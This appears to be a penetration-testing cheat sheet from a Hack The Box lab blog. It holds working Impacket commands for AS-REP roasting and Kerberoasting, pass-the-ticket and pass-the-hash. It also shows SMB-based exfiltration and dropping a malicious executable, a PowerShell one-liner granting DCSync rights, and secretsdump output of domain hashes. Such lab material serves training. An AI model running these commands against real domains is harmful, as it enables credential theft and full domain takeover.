HTB – Impacket

2022/09/13
  • 進攻是最好的防守
    •

    Kerberoasting

    Details here:

    >impacket-GetNPUsers -no-pass -dc-ip 10.10.10.161 htb/andy
>for user in $(cat users.txt);do impacket-GetNPUsers -no-pass -dc-ip 10.10.10.161 htb/${user} | grep krb5asrep; done

    Confirm if the user is having the property ‘Do not need Kerberos Preauthentication’ set (UF_DONT_REQUIRE_PREAUTH)

    >impacket-GetUserSPNs -dc-ip [IP] '[Domain]/[ID]:[PW]' -save -outputfile [out]

    Conduct Kerberoasting to retrieve the hash

    Transfer Files with SMB

    >impacket-smbserver share . -smb2support -username NL -password NL
>Evil-WinRM* PS C:\Users> net use \\[IP]\share /u:NL NL
>Evil-WinRM* PS C:\Users>dir \\[IP]\share
>Evil-WinRM* PS C:\Users>copy file \\[IP]\file1
>Evil-WinRM* PS C:\Users>copy \\[IP]\malicious.exe .

    Use smbserver.py to exfiltrate the data(Link):
    1. Enable a smb server on attacker’s machine.
    2. mount the share folder on victim’s machine. Check by dir command
    3. copy the target file to the share folder. Or copy the malicious exe to victim

    Pass the Ticket

    >impacket-ticketConverter ticket1 ticket1.ccache
>export KRB5CCNAME=/path/to/ticket1.ccache;
>impacket-psexec [Domain Name]/[account]@[DNS hostname] -k -no-pass -dc-ip [IP] -debug

    After retrieved the ticket by AD Certificate Service vulnerability(CVE-2022-26923)(AD CS Domain Esc):
    1. Convert the kirbi(commonly used by Mimikatz) to ccache(Credential Cache) ticket
    2. Pass the Ticket by Impacket. Be careful not forget the option -dc-ip. The DNS hostname after the account is also vital. Try all the combinations if the cmd above doesn’t work.

    Pass the Hash

    >impacket-wmiexec -hashes [hash] htb.local/NL@10.10.10.161

    Use wmiexec to execute PtH attack. Please note can’t run PowerShell in wmiexec shell

    MSSQL client

    >sudo impacket-mssqlclient [ID]:'[PW]'@[IP] -windows-auth

    Access to MS SQL by mssqlclient

    DCSync attack

    Evil-WinRM* PS C:>net user NL

Evil-WinRM* PS C:>Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members NL; $username = "htb\NL"; $password = "PW"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'NL' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync

Evil-WinRM* PS C:>net group 'Exchange Windows Permissions'

>root@kali# secretsdump.py svc-alfresco:s3rvice@10.10.10.161
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435....ad3b435......
....

    This is a DCSync attack(mimic replication then request the PW hashes), the classic use for DCSync is as a precursor to a Golden Ticket attack, as it can be used to retrieve the KRBTGT hash.
    1. Confirm account’s permission
    2. Escalate privileges – DCSync rights
    3. secretdump the hash for PtH attack
    DCSync ports: 135+445+49667

    關於作者

    Nelley,乃力。
    就是一個村民。